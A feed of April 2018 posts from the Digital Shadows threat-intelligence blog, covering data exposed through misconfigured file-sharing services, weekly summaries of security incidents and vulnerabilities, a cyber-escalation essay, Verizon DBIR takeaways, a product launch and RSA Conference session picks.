Digital Shadows Manage Your Digital Risk Wed, 18 Apr 2018 16:08:21 +0000 en-US hourly 1 Out In The Open: Corporate Secrets Exposed Through Misconfigured Services Wed, 18 Apr 2018 14:31:10 +0000 For organizations dealing with proprietary information or assets, one of the greatest concerns is the threat of competitors getting hold of trade secrets. But what if organizations are already leaving their precious Intellectual Property (IP) publicly exposed, within easy reach of attackers?

Our latest research report, “Too Much Information”, highlights the sheer scale of this occurrence. The reality is that a lot of organizations are giving up this information freely, by unintentionally exposing IP through Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


Would you like any secret source with that?

Among the 1.5 billion files we found exposed through these services were over 95,000 examples of source code information, 900 patent applications, and 69 copyright applications.

Figure 1: Types of publicly-available intellectual property

In one instance, we detected a document containing proprietary source code that was submitted as part of a copyright application (Figure 2). The file included code that outlined the workflow and design of a site providing Electronic Medical Records, all of which was uploaded onto a publicly accessible Amazon S3 bucket.

Figure 2: Introductory page for copyright application containing source code for a company’s app

In another example, we came across an archive of patent summaries for a renewable energy technology company (Figure 3). These documents were marked as “strictly confidential” and contained a copious selection of patent applications complete with detailed labelled diagrams, patent application numbers, filing dates and patent descriptions that discussed the advantages and disadvantages of their product.

Figure 3: Redacted page from patent documents belonging to renewable energy company 


Corporate espionage made easy

Of all the data organizations look to control, IP is among the most precious. Loss of IP can have a number of considerable impacts:

  • Financial loss. There are obvious economic consequences to losing your most sensitive IP. First there’s the actual costs associated with dealing with the security incident. Resources will have to be assigned to investigate how the exposure occurred, improving security measures, and dealing with the PR response. Perhaps, more damagingly, the release of product information ahead of schedule can seriously damage an organization’s financial performance. For technology companies, the source code your developers have spent months putting together could suddenly be released by malicious actors ahead of schedule, seriously dampening your sales prospects. For some companies, this could put their future in grave jeopardy.
  • Competitive de-positioning. Imagine a pharmaceutical company that has spent years researching a new drug; all that time and financial input would go to waste if a competitor on the other side of the world now had all the information needed to put that drug into production. Proprietary code, patent applications and copyright information would give your closest business rivals some very timely and useful competitive intelligence.
  • Reputational damage. Loss of IP might cost you customers and contracts, credit ratings, stock market value or brand reputation. No organization wants to be known as a company that can’t keep its own source code under wraps. If companies can’t be trusted to protect their most prized assets, then customers will likely assume that their overall approach to data protection, including protecting personal data, is also lacking.
  • National security risk. Certain industries such as defense, manufacturing and national infrastructure worry of being caught in the midst of great power struggles between states. Nation state or state-affiliated actors conduct espionage campaigns to steal information that can improve a country’s military, market or export trade position. The stakes for properly securing sensitive assets are therefore far higher in certain industries, and extend beyond the immediate concerns of the particular organization involved.


While organizations may worry about corporate espionage conducted through insiders, network intrusions and phishing campaigns, these findings demonstrate that there is already a large amount of sensitive data publicly available. Talk about making the competition’s job even easier.

To learn more about the other types of sensitive data that these services are exposing, download a copy of our report.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

When There’s No Need to Hack: Exposed Personal Information Tue, 17 Apr 2018 14:57:11 +0000 With Equifax‘s breach of 145 million records still fresh in everyone’s memory and the recent Facebook data privacy controversy, protecting personal data has become part of the political, economic and cultural zeitgeist. Debates over how data can be misused are now commonplace, and newsfeeds are awash with stores of “yet another breach of personal information”. There’s a reason for this; data is a valuable commodity, and there’s a lot of money to be made from trading personal information or using it for fraud. Cybercriminals are therefore continuing to launch phishing campaigns and network intrusions designed to collect personal data.

However, our latest research report, “Too Much Information”, highlights that there is a large amount of personal data already exposed that puts your employees and customers at risk. This data is unintentionally made public through misconfigured Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites. Let’s focus on a few examples that illustrate the extent of this exposure.

Tax Returns

Today is tax deadline day, which means there are still people scrambling to submit their tax returns. This window affords criminals opportunities to commit tax return fraud. As we talked about in a previous blog, “It’s Accrual World: Tax Return Fraud in 2018”, criminals go to great lengths to acquire this information. Spoiler alert: there’s plenty of information already out there.

Figure 1: Types of publicly-available personal information

In fact, the most common employee data found in our research was payroll and tax return files, which accounted for 700,000 and 60,000 files respectively. Looking into many of these examples, it was common for this information to be exposed through a contractor – for instance, a boutique accounting firm that backed up their client information. A redacted exposed pay stub is shown in Figure 2.

Figure 2: A redacted example of an exposed pay stub

Unhealthy Exposure

Aside from financial information, there was also a strong medicinal flavor to the findings. Almost 5000 patient lists were publicly available. Most surprisingly, we found over two million .dcm files (2,205,350) exposed on an open SMB port based in Italy. These Digital Imaging and Communications in Medicine (DICOM) files enable the creation and storage of medical tests, like MRIs, that contain personal health information. That’s an awful lot of files, and it doesn’t get much more personal than that.

Personally Identifiable Information versus Personal Data

Personally Identifiable Information (PII) and Personal Data are two terms that are often used interchangeably.  PII is mainly used in the U.S. and is defined by NIST as:

“Any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual‘s identity, such as name, social security number, date and place of birth, mother‘s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.”.

Pretty comprehensive, right? Well, not as comprehensive as “personal data”, which broadens the definition to include things like device ID, IP addresses, and cookies. Personal data is used as part of the General Data Protection Regulation (GDPR) definition, which comes fully into place next month.

Our research found that a significant portion of the exposed data was in the European Union (537,720,919 files). With GDPR firmly on the horizon, organizations must consider how they are protecting employee and consumer information across these services. With employees and contractors often backing up and archiving data on their home networks or using cloud storage solutions, organizations need to ensure they have visibility into all the potential areas their customers’ personal data may be exposed. Out of sight may mean out of mind, but with GDPR coming into force, this could also mean organizations may soon be “out of pocket”.

Figure 3: The top countries making up the 500 million exposed files in the European Union


To learn more about the other types of sensitive data that these services are exposing, download a copy of our report. You can also find out more about the implications of GDPR in our “Path to Compliance” paper.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

Shadow Talk Update – 04.16.2018 Mon, 16 Apr 2018 14:32:47 +0000 This week’s Shadow Talk discusses a Cisco Smart Install Client flaw exploited in disruption attack, an information leak vulnerability discovered in Microsoft Outlook, details on OpIcarus and OpIsrael, Verizon DBIR, and why you still should be excited about the RSA Conference.


Cisco Smart Install Client enabled mass disruption

Attackers abused a legitimate Cisco Smart Install Client protocol to target Iranian and Russian switches in a disruptive operation. Through defacements left on start-up configuration of affected devices and statements to journalists, the perpetrators claimed to have acted in defense of the integrity of United States elections, although their identity and origin remains unknown. This activity occurred within the context of escalating political tensions between the United States and the impacted nations. The tools needed to identify and exploit the flaw are readily available, potentially allowing exploitation by attackers with even low capabilities. System administrators should disable the Smart Install Client function and limit access to Port 4786/tcp to mitigate exposure.

New ATM malware variant discovered

A potentially new variant of automated teller machine (ATM) malware, “ATMJackpot”, was documented by security researchers. Its operators attempt to steal cash from ATMs by connecting to cash dispensers and other peripheral devices via a piece of middleware called eXtension for Financial Services (XFS) Manager. Because the initial infection vector for ATMJackpot is not known, a full assessment of its threat cannot be made at the time of writing. If the malware was installed via network intrusion, that would typically require technical capability and would indicate that the wider attack campaign represents a high level of threat. However, if it was installed via physical access to ATMs, fewer skills would be needed and the financial impact would likely be significantly lower. Given the lack of details, the discovery of ATMJackpot does not necessarily represent a dramatic escalation in threat.


Microsoft Outlook flaw allows theft of password hashes

A Microsoft Outlook flaw enables attackers to abuse the way the software renders email messages containing Object Linking and Embedding (OLE) objects, and gather user password hashes and other sensitive information. A patch has been released for this vulnerability (CVE-2018-0950); without it, if an OLE object is hosted on a remote server and embedded in a message, Outlook initiates a connection via Server Message Block (SMB). The result is unauthorized information disclosure, with greater consequences if the technique is combined with other exploits. Digital Shadows has not seen reports of the vulnerability’s exploitation in the wild, although it would not require a high level of capability. Implementing the patch and blocking inbound/outbound SMB connections to the network perimeter, where possible, can be effective. 


Film service customers victims of payment data breach

On 09 Apr 2018, multiple media outlets reported on an allegedly targeted attack against food-service and facility-management company Sodexo’s cinema voucher program, Filmology. Sodexo stated that credit cards used on its website between 19 Mar 2018 and 03 Apr 2018 may have been compromised, and that it continues to investigate. However, a Filmology representative allegedly claimed that “the hack on the payment page was carried out over 2 months and involved many accounts”. Customers of Sodexo’s Filmology service should monitor for fraudulent charges to their credit cards and consider replacing those used during the date range stated by the company.


Compromised websites delivered NetSupport Manager RAT

On 05 Apr 2018 researchers at security company FireEye reported on a campaign delivering the commercially available “NetSupport Manager” remote-access tool (RAT). Threat actors used compromised websites to prompt visitors to download fake Flash, Chrome and Firefox updates. These were JavaScript files that ultimately fetched the RAT payload from a remote server. Digital Shadows’ research into the IP address used in the campaign demonstrated it has likely been used to distribute malware since at least November 2017. The threat actors have likely had some success, given the duration of activity. Their motive is unknown. Indicators of compromise can be found on the Digital Shadows online portal.


New activity sparked by OpIsrael and OpIcarus

Beginning on 07 Apr 2018 multiple hacktivists tweeted attack claims, as part of OpIsrael, an “Anonymous” collective-affiliated operation in support of Palestine. Attack claims typically included website defacements. However, Twitter user LorianSynaro also claimed to have obtained databases of 83 Israeli universities; a sample uploaded to code-sharing website Hastebin contained no sensitive information and was likely obtained from open sources. More OpIsrael claims are likely in the short-term future (within three months). Moreover, an operational announcement has called for a new phase of the OpIcarus hacktivist campaign in June 2018. The type of activity was not stipulated, but will highly likely include denial of service (DoS) attacks and data breach claims against financial entities. Recent iterations of OpIcarus have attracted scant threat actor involvement; thus, this new phase poses a very low risk at this time.


New botnet scanning activity targeting Brazil

Security company Trend Micro identified and reported on scanning activity targeting vulnerable internet of things devices in Brazil. The scanning originated with several compromised devices in China and mirrored the behavior of previously identified “Mirai” botnets, which used default and weak credentials to hijack devices. Mirai’s source code was publicly released in October 2016, which has enabled numerous threat actors to develop their own botnets of varying size. Targeting weak credentials is a common tactic used to create botnets; users should replace these with complex passwords.

Escalation in Cyberspace: Not as Deniable as We All Seem to Think? Thu, 12 Apr 2018 15:01:47 +0000 The recent assassination attempt on former Russian spy Sergey Skripal has led to a deluge of cyber-based conspiracy theories within the London security community. My own personal favourites are that (a) Skripal was targeted for assassination due to his alleged engagement with the UK security services over the Democratic National Congress hack in 2017, and (b) that the UK government considered a cyber-attack on Russia in response to the assassination attempt. To date, both these claims remain completely unsubstantiated. However, that so many theories around the Skripal assassination attempt link cyber operations to a conventional covert operation is symptomatic in my mind of how intertwined with cyber threats modern international relations has now become.


Escalation and de-escalation in international relations

International Relations (IR) is a deeply complex field of study that is increasingly integrating cyber security issues into its analysis. One concept within the field of IR that is particularly useful for understanding issues such as the ones generated by the Skripal event is that of escalation in levels of hostilities between states. Escalation occurs between states during or in the run-up to a period of conflict, and a situation can be seen either to be escalating or de-escalating depending on the situation and the wishes of the states involved.

One of the best examples of escalation is the Cuban missile crisis of 1962, when the construction of ballistic missile launch facilities (silos) on the island led the Kennedy administration to impose a military blockade and demand the withdrawal of all weapons from Cuba. Within this case an important point to note is that the processes of escalating and de-escalating involved signalling between the US and Russia. Examples of signalling within the crisis included the building of missile silos (escalation), Kennedy’s address to the US on the 22 October 1962 (escalation), Soviet withdrawal of missiles (de- escalation), and US public commitment to respect Cuban sovereignty (de-escalation). These are all examples of both provocative and palliative signalling between the states.


Figure 1: Cuban Missile Crisis game tree modelling how US and Soviet actors would have considered their decisions (Source: Wikimedia Commons)


Cyber and the “space between”

Cyber operations are often, I believe incorrectly, portrayed as being desirable precisely because they do not cause escalation between states. As Eric Rosenback former Assistant Secretary of Defence and principle cyber advisor to the Pentagon from 2011 to 2015 commented:

“The place where I think it will be most helpful to senior policymakers is what I call “the space between.” What is the space between? … You have diplomacy, economic sanctions…and the you have military action. In between there’s this space, right? In cyber, there are a lot of things that you can do in that space between that can help us [the United States] accomplish the national interest.”

The “in between” area referred to by Rosenback is symptomatic of the sentiment that cyber operations have a high level of plausible deniability and hence do not have the potential to escalate a conflict in the same way a physical operation does.

However, a historical review of major cyber incidents shows this theory to simply not be true. The distributed denial of service (DDoS) attacks on the Estonian economy circa 2007 are still used to frame Russia as a highly aggressive cyber actor, even though the attribution is thin. After the Sony hack of 2014, the US conducted a  thinly veiled cyber-attack on the North Korean Internet. One of the legacies of the Stuxnet incident of 2010 was Iran prioritizing the development of its own cyber warfare capability that bore its own bitter fruit in 2012 with an attack on Saudi Aramco.

What all these cases show is that far from being a consequence-free way of striking against an enemy, when attributed to a state (no matter how tenuously) cyber-attacks can lead directly to escalation. Herein lies the issue with cyber conflict: signalling between states in physical space such as the Cuban missile crisis is very clear; however, within cyberspace what is an escalating and de-escalating signal is very difficult to interpret.

Coupled with this is the issue of proportionality and what the cyber equivalent of a minor skirmish versus an all-out assault actually is. Here the potential for unplanned escalation between states rises exponentially. As a recent Chatham House paper commented: “there is a risk that any such [cyber] operation could be construed by the targeted state, or even the international community at large, as a use of force, leading to escalation of the situation”.


To conclude, what we have not seen to date is a “cross over event”, where a physical act of violence has provoked a cyber-attack that has in turn escalated to a retaliatory act of physical violence. Nevertheless, the discussions around events such as the Skripal assassination attempt have put this type of scenario on the agenda. Within this context, the idea that cyber is somehow “the space between”, where action has no consequence, is now simply incorrect.


To learn more, subscribe to our threat intelligence emails here.

Leveraging the 2018 Verizon Data Breach Investigations Report Tue, 10 Apr 2018 18:24:15 +0000 Today, the 11th edition of the Verizon Data Breach Investigations Report (DBIR) has been released. This year’s report includes 53,308 security incidents, 2,216 data breaches, 65 countries, and 67 contributors.

I participated in a panel discussion with the Verizon team on BrightTALK earlier today. Listen to the recording here.



The DBIR is one of the most anticipated annual reports and has endured for many years. If you’ll indulge me and take a trip down memory lane, here are some of the events you might remember from the year the first DBIR was written:

  • The first Twilight film was released, and the nation was divided by “Team Edward” or “Team Jacob.”
  • The Dark Knight starring Heath Ledger was released. This serves as a painful reminder of just how terrible Ben Affleck’s Batman is.
  • The stock market crashed on September 29, 2008.

Some of the key findings for me:

  • “68% of breaches took months or longer to detect.” In a world of real time this and real time that, I’d be happy to forgo the real time if I get better fidelity alerting. From both my time at Forrester and my time now as CISO, I generally view “real time intelligence” as “real time false positives” that are going to create more work for my security team. If we are looking at “months or longer” for breaches, I’d be happy to wait a few more hours or days to get better quality reporting that doesn’t DoS (denial of service) my team and reduce my overall time to detect.


  • Ransomware is the top flavor of malicious software, found in 39% of cases where malware was identified. You must have a plan for extortion attempts, and not just ransomware, but also DDoS extortion or intellectual property extortion. Your business continuity planning must take these scenarios into account. My colleague Harriet Gruen and FBI Supervisory Special Agent, Sheraun Howard, recently did a webinar on ransomware that you might find useful. “Emerging Ransomware Threats and How to Protect Your Data


  • I find the “Denial of Service: Storm preparations” section to be particularly relevant. This was a focus area of mine at Forrester and I also have to deal with this in my day job. DDoS “attacks, on average, are more like a thunderstorm than a Category 5 hurricane”. “You will find that most of the attacks are measured in minutes.” The question for CISOs is how much do I invest in a thunderstorm? Do I have enough budget to prep for a Category 5 hurricane? When it comes to budget tradeoffs these are important questions.  Having intelligence on threat actors who conduct these activities against your industry can help with this calculation.


  • JavaScript (.js), Visual Basic Script (.vbs), MS Office and PDF10 tend to be the file types found in first-stage malware. This isn’t breaking news, but it’s a good reminder to make sure we incorporate this into our vulnerability management triage process. We should be tracking the software, technologies and CVEs that malware is exploiting.


Source: Verizon DBIR

Since we are eleven years into the DBIR, I suspect that you are familiar with how to leverage the report, but just in case you aren’t, here are some quick suggestions:

  • The report is filled with great content, and there is a lot of it. The report is nearly 50 pages without the appendices. I found it useful to read through it once in its entirety before I started making notes. I understood the full context and then I could start breaking it down into “byte-sized” bits.


  • Yesterday was National Unicorn Day, and you may very well be a unicorn. Not everything in the DBIR will apply to your business. Make sure to take this into consideration while reading the report.


  • Go to Figure 28 “Industry Comparison” on page 26, look at your industry and the attack patterns that are most common in the DBIR data set. Do you have the appropriate security controls in place to detect and mitigate these attacks?


Source: Verizon DBIR

  • You can use the attack patterns to build intelligence requirements and to kick start your collection plan. For example, if you are in the banking industry you can build or buy collection capabilities around these areas:
    • Banking Trojans (tools, actors, exploits, configuration files)
    • Denial of service (tools, actors, target selection)


I’ve already read through the DBIR multiple times and with each subsequent reading I find something else that is useful. One final recommendation that I’ve been suggesting for many years is to create your own version of the DBIR based on your own intrusion and breach data. Nothing is more relevant than what is happening within your own organization. The DBIR has some great examples of graphics that you can incorporate into your own tailored reports, which you can then use to communicate the threat landscape to your executives.


To learn more, subscribe to our threat intelligence emails here.

Introducing Shadow Search – Quickly enable deeper research and investigation Tue, 10 Apr 2018 01:35:30 +0000 All enterprises face key challenges in their quest to protect their organization from cyber threats. One challenge I hear consistently from security professionals is the difficulty keeping up with the volume of alerts generated by their security controls. The problem they face is that each alert needs to be analyzed and understood before a decision is made. To do that, teams are using a range of tools and information like open source feeds, specialist news or blogs, and threat intelligence sources to enrich their understanding of the alert before they can make a decision. This enrichment takes time. Unfortunately time is perhaps the scarcest commodity for security professionals because there aren’t enough of us, the number of alerts is ever increasing and the pressure is on because the costs of poor decisions are going up.

Shadow Search, the enhanced search capability we are adding to our SearchLight service, is all about giving a bit of time back to security teams. Our customers were telling us that the insight we provided with our Digital Shadow alerts could be really useful in support of their security operations process for alerts from other sources. When we looked at this, we felt there was an opportunity to add more information sources and scope to make the massive amounts of data from the deep, dark, and open web more accessible and discoverable from the SearchLight portal, better supporting these customers as they make decisions.

So I am excited that we have just launched our new “Shadow Search” capabilities, designed specifically to provide the data that security teams need to make decisions faster. Shadow Search transforms the threat intelligence search function, delivering market leading coverage and user experience. Users now have unrestricted access to a vast and expanding Digital Shadows content repository to investigate and pivot between data sources, threat actor information and incidents.



Shadow Search includes security relevant sources as diverse as criminal forums, reputable security blogs and dark web pages, in addition to Digital Shadows cyber threat intelligence (CTI) and third-party threat intelligence feeds. Organizations can use this practical and actionable information to enhance their understanding of threats, in their business context. Examples of use cases include the ability to:

  • Investigate security incidents – pivot from observed incidents on your network to gain further context about a threat or threat actors
  • Monitor global events and industry trends – access to real-time data and finished threat intelligence allows you to track threats associated with geography, sector or area of interest and stay ahead of the unfolding developments
  • Manage third party risk – identify weaknesses in your supply chain, including if a supplier has been the subject of a breach, or vulnerabilities in your software are being commonly exploited in the wild
  • Research threat information to help prioritize resource usage – detect new activity by a tracked threat actors and changes to malware campaigns to support business cases

Analysts can save their searches and return to them or subscribe to receive updates that meet their specific enterprise criteria.

Shadow Search benefits include the following:

  • Immediate access to threat data– Get instant access to raw collection when you need it.
  • Broad coverage – A vast repository of data including curated threat intelligence, content for hard to reach web sources (dark web) and more, including exploits and observables, all in one place opened up for search.
  • Relevant results – Smart filters and powerful search syntax allowing users to focus in on the information that’s most relevant to them.
  • Actionable information – Rich results with associated observables, intuitive interface, and full export enables users to make operational use of the results.

Collaborative development

Having only recently joined Digital Shadows, I got my hands on the capability after it had been extensively trialed by our beta customers; a huge thank you goes to those who collaborated with us on that process. I found the UI intuitive, and the timeline and summary views help put the results in context.

We’ve added features like advanced filtering by source, date range and information type and export capabilities in direct response to the feedback we have had from the beta. See the screen shot above for a view of the Shadow Search interface, but only a hands-on demo really does it justice. It will be at RSA Conference for those who are attending and if you can’t make it, we would be happy to arrange a demo for you.

Our beta clients now tell us it’s easy to investigate an incident and pivot to related research and forums or research threat actors and that the unrestricted access to the original sources and proprietary Digital Shadows cyber threat intelligence (CTI) is very welcome. Most importantly, we are now hearing that it is saving them time.

One beta test meeting with a worldwide manufacturer particularly stands out for me: “You’ve incorporated all my requirements and suggestions; this is awesome. It will save me time and help me focus on priority research and threat investigations.”

In Summary

I think Shadow Search is a truly valuable addition to our SearchLight service and will help our clients to use our wealth of knowledge to investigate threats and make decisions faster, giving back valuable time to the security operations function. Learn more about Shadow Search by downloading our datasheet or requesting a demo. It will be available to all customers in Q2.

Shadow Search for Digital Shadows SearchLight™
Stay up to date with our latest news and threat intelligence. Subscribe to our threat intelligence emails here.

Shadow Talk Update – 04.09.2018 Mon, 09 Apr 2018 20:52:07 +0000 Back from the Easter break, this week’s Shadow Talk discusses what the re-emergence of WannaCry, exposure of Aggregate IQ data, exposure of 1.5 billion files through misconfigured services, as well as lessons learned from the Panera breach, an emerging new criminal market, and much more.

Oil pipeline company disrupted by unidentified cyber attack

Certain parts of the electronic data interchange (EDI) communication system used by a US oil and gas pipeline company were rendered temporarily unavailable by an unspecified online attack. At the time of writing, the attackers’ tactics, techniques and procedures (TTPs) remain undetermined. The victim company, Energy Transfer Partners LP, stated that the flow of natural gas remained unaffected throughout the incident, and that no information was stolen or compromised. Oil and gas companies, including those affiliated with national infrastructure, continue to be prime targets for financially motivated and espionage-seeking threat actors.

Malaysian central bank thwarts SWIFT attack

Bank Negara Malaysia claimed to prevent a theft of funds via the Society for Worldwide Interbank Financial Telecommunication (SWIFT) system. The attackers had tried to make fraudulent wire transfer requests through the SWIFT platform. Bank Negara Malaysia stated that no funds were stolen, and that the payment and settlement systems were not affected or disrupted. In the past six months, several financial entities in Russia and South-East Asia have been targeted by attackers attempting to steal funds via SWIFT. The continued targeting of financial institutions and their geographic concentration indicate a single threat group may be responsible. Given that these attacks target banks’ internal security systems, rather than the central SWIFT system, the perpetrators may be perceiving these locations as having weaker internal security standards.

Boeing production plant infected by WannaCry

The “WCry (aka WannaCry) malware reportedly infected a small number of computers at a Boeing production plant, triggering concerns that airframe testing equipment and software may have been compromised. Boeing later stated that no disruption had been caused to its production programs. It remains unknown whether this version of WCry was the same used in the widespread campaign of May 2017, and therefore whether the same threat actor is responsible. Alternatively, this version may have been spoofed and exploited by different threat actors to encourage swift payment of the ransom through WCry’s notoriety.

Luxury retailers hit by credit card breach

Credit card details held by luxury retailers Saks Fifth Avenue and Lord & Taylor were breached, and a portion of the data was advertised for sale on dark web marketplace Joker’s Stash on 28 Mar 2018. Security research company Gemini attributed the breach to financially motivated threat actor “FIN7; however, evidence for this attribution remains unclear. The retailers’ parent entity, Hudson’s Bay Company, did not specify how many customers were affected, but more information may be released in the near future (next three months).

Millions of Panera customers’ personal details allegedly compromised

On 02 Apr 2018 security researchers reported that a flaw on PaneraBread[.]com, the main website of United States bakery-café-restaurant chain Panera, had potentially left over seven million customer records exposed since Aug 2017. Threat actors could use the data for identity theft and fraud, although Digital Shadows’ research has uncovered no evidence that the records have been used maliciously. The flaw appears to have been fixed on 02 Apr 2018, but prior to that the information could have been downloaded by threat actors and it may remain available.

ChessMaster observed exploiting CVE-2017-11882

Espionage campaign ChessMaster has shown updated TTPs in the ongoing targeting of a variety of industries in Japan, by using an exploit for CVE-2017-11882, which exploits a vulnerability in Microsoft Office’s Equation Editor. Its use has been observed several times over the past five months in campaigns by various threat actors. Enterprises using Microsoft Office 2007 to 2016 should apply relevant security updates from Microsoft.

One CISO’s Recommendations for Making the Most of RSA Conference Sessions Mon, 09 Apr 2018 15:19:15 +0000 Last week, Enterprise Strategy Group (ESG) principal analyst, Jon Oltsik, wrote an article for CSO titled: “RSA Conference: CISOs’ top 4 cybersecurity priorities.” Jon highlighted four areas that security executives will be looking for at next week’s RSA Conference:

  1. Executive-level threat intelligence (Jon highlighted Digital Shadows in this category)
  2. Integrated security platforms
  3. Business risk
  4. Changing security perimeters

In the past, I’ve written my own RSA Conference (RSAC) preview blogs and Jon’s article reminded me that I should do it again. A few things to note before I get started:

  • This blog is going to be focused on conference talks that will resonate with most CISOs.
  • I know there will be many other activities going on next week and you have limited time, let me help you maximize the time you have allotted for talks.
  • You should absolutely take advantage of “hallwaycon” and all the networking opportunities associated with the RSAC week. This will get you the best return on your investment.
  • You could just go to the RSAC “Sessions & Events” page and search by the “Core Topic” of “C-Suite View” or “Security Strategy,” but your time is precious. So, to save you some, I spent the morning going through the RSAC agenda, so you don’t have to.
  • I focused on the following areas: (1) investment, metrics, and communication, (2) GDPR, (3) recruiting and retaining staff, (4) third party risk, (5) cloud native security, and (6) national security.


Here are my recommendations for the RSAC talks you should check out:

  • The Innovation Sandbox. This isn’t a talk, but something I highly recommend nevertheless. I’m a big fan of the Innovation Sandbox, and while I was at Forrester Research I moderated several panels at the event. I admit I could be a bit biased towards it. The Innovation Sandbox is a great way to track startups that could help you solve some of the challenges that CISOs face. It is also fun to watch the pitches, and you can also pick up techniques to improve your own presentation style/public speaking. This can be very useful, particularly as you think about it applying to your own board presentations.
  • Investment, metrics, and communication. This year, there is no shortage of CISO focused talks. I suggest the following as the topics really resonate with me and there are also real work examples from practitioners in the mix. These talks also align with Jon Oltsik’s business risk area from his CSO article.
    • Stop Translating, Start Defending: Common Language for Managing Cyber-Risk TECH-W04
    • Building and Selling Your Security Strategy to the Business STR-W14
    • Creating Order from Chaos: Metrics That Matter GRC-W04
    • Implementing a Quantitative Cyber-Risk Framework: A FinSrv Case Study STR-W02
    • Security Programs. ROI not CYA EXP-R14
    • Charting a Clear Course: Prioritizing Security Investments and Activities STR-T07
    • 10 Tenets of CISO Success STR-W04
    • Inside Cyber-Balance Sheets: A Rare Window on Digital Risk in the Boardroom CXO-R14
  • GDPR. Worried about GDPR? You will be. If you deal with European Union citizen data, this year’s RSAC has you covered and it’s important since GDPR enforcement is now “next month.” I’m almost as excited for GDPR as I am the for Deadpool sequel featuring Thanos, and the new Han Solo movie (please, please save it Donald Glover). While I work on my Privacy Impact Assessments, consider these talks:
    • How to Tackle the GDPR: A Typical Privacy and Security Roadmap PRV-T10
    • The GDPR Is Only for Europe—Right? GRC-R02
    • GDPR Compliance—You Forgot Your Digital Environment GRC-R12
  • Recruiting and retaining staff. I think the “cyber security talent shortage” is a self-fulfilling prophecy. Don’t be a statistic, and don’t succumb to the hype! I think these talks can help you:
    • A NICE Way to Find and Keep Cybersecurity Workers PROF-W04
    • The Cybersecurity Job Seekers Report: Results and Implications AST1-W02
    • The Life and Times of Cybersecurity Professionals AST3-R02
  • Third party risk. I’m always looking for ways to get better at managing third party risk and if you read the headlines, nearly everyone else should be looking as well. I would’ve liked to have seen more talks on this topic. I included some Peer2Peer talks in here as well:
    • Personality Profiling Your Third Parties for Effective Supplier Management STR-T08
    • The Supply Chain Threat GRC-T10
    • Effectively Managing a Third-Party Technology Risk Program P2P4-R05
    • Third-Party Risk Assessment Tilt-A-Whirl. Stop the Ride, I Want to Get Off! P2P3-W04
  • Cloud security. Cloud security is a key component of our security program and the same is likely true for you. I really like the contrast of following two talks. In the first, you have one of, if not the top industry analyst who covers cloud security Rich Mogull (of Securosis fame). In the second, you have the founder and former CEO of Tim Prendergast, who is now the Chief Cloud Officer at Palo Alto Networks. was recently acquired for a cool $300 million.
    • Building and Adopting a Cloud-Native Security Program CSV-W14
    • Is Cloud-Native Security Enough? SPO3-W14
  • National Security. I’m a self-professed national security geek and I think all CISOs need to track geopolitical and national security issues. Check out these talks:
    • Cyberwar Game: Behind Closed Doors with the National Security Council EXP-T07 (I’ll pretty much watch anything Jason Healey is involved in)
    • DARPA R&D Enabling US Cyber-Deterrence PNG-F03R (DARPA is cool, and they are doing this talk twice!)
    • Former NSA and Israeli Intelligence Directors on Resilience EXP-F01 (Despite getting 8200’d/NSA’d to death at Forrester, I still want to see this talk).

Am I missing any talks that resonate with you? Please share.

I know that many people (queue the Infosec Twitterverse) bash big security events like RSAC, my suggestion is to ignore that and make the most of the event. Next week is a great opportunity to gain knowledge that you can bring back to your team and an excellent opportunity to build your professional network.

Next week is also a great time to unwind and step away from the chaos that is being an information security professional.  Digital Shadows is sponsoring the “Security Leaders” party on Tuesday night April 17th at City View @ Metreon. Come join us and have a good time with your peers and make some new friends. You can register here.

RSA Party Digital Shadows

When Sharing Is Not Caring: Over 1.5 Billion Files Exposed Through Misconfigured Services Thu, 05 Apr 2018 12:23:14 +0000 Our recent report “Too Much Information”, discovered over 1.5 billion files from a host of services, including Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


We love data, and we need ways to store, share and transfer this data to other individuals and parties. There are a range of services that are used to do this, and one way that has gained popularity over the last few years is cloud storage, specifically Amazon Simple Storage Service (S3) buckets. Unfortunately, many administrators misconfigure these S3 buckets rendering the contents publicly-accessible. Barely a month goes by without another open S3 bucket being discovered – who remembers the data of 198 million voters being exposed last year?

However, S3 buckets are not alone. In our research we found that they only constituted seven percent (7%) of the exposed files we found. Many other services that are used to store, share, or transfer data are also frequently misconfigured:

  • File Transfer Protocol (A network protocol used to transfer computer files);
  • rsync (A way of transferring and synchronizing files);
  • Server Message Block (A network file sharing protocol);
  • Network-attached storage devices (Devices often used to backup home computers).

Combined, these services expose over 1.5 billion files, with SMB, rsync and FTP accounting for 33, 28, and 26 percent respectively.


What’s the damage?

The amount of exposed data is staggering. Over twelve petabytes of data is exposed (12,000 terabytes). For context, this is over four thousand times larger than the “Panama Papers” leak (2.6 terabytes). It’s also 12 thousand times larger than the Deep Root exposure of 198 million voters in 2017. Almost all countries are affected, but the United States experienced the most exposure with 239,607,590 files.


Figure 1: Geographical distribution of exposed data


Types of Exposed Data

It’s not just the volume but the sensitivity of the data that is a major cause for concern. There were a number of instances of high severity exposure of personal information, intellectual property, and security assessments.

There is an incredible amount of personal data exposed, including payroll, tax return and healthcare information. If we consider how much is exposed (the news that the data of 87 million Facebook users may have been harvested is a good example), this adds significantly to this already rich trove of data, providing more and more information that could be used for malicious purposes such as social engineering and fraud. Furthermore, with GDPR fast-approaching, there are clear regulatory concerns for organizations surrounding the protection of personal data, particularly if employees and contractors are copying and archiving work files using cloud storage and NAS solutions.


 Figure 2: Types of publicly-available personal information


Our report also highlights numerous cases of intellectual property that is also exposed through these services. In one instance, a technology company providing Electronic Medical Records software had their copyright application and full source code publicly-available. In another instance, an energy company had sensitive details and diagrams of their patent-pending technology exposed. Loss of intellectual property can also have considerable financial and reputational impacts.


Figure 3: Types of publicly-available intellectual property


